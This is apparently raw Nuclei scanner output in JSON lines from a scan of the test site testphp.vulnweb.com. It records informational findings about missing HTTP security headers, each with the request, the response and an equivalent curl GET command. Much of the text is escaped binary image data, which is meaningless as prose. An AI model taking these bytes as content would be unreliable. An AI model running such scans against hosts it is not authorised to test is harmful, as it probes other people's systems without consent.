ffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.508714153Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.811879733Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 